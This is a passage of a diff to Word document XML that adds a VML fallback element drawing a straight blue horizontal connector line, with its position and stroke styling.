+        <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
           <w:pict w14:anchorId="6687816B">
             <v:line id="Straight Connector 2" style="position:absolute;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:left;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin" o:spid="_x0000_s1026" strokecolor="#0072c6 [3204]" strokeweight=".5pt" from="0,13.05pt" to="609pt,13.05pt" w14:anchorId="130CE43D" o:gfxdata="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">
               <v:stroke joinstyle="miter"/>
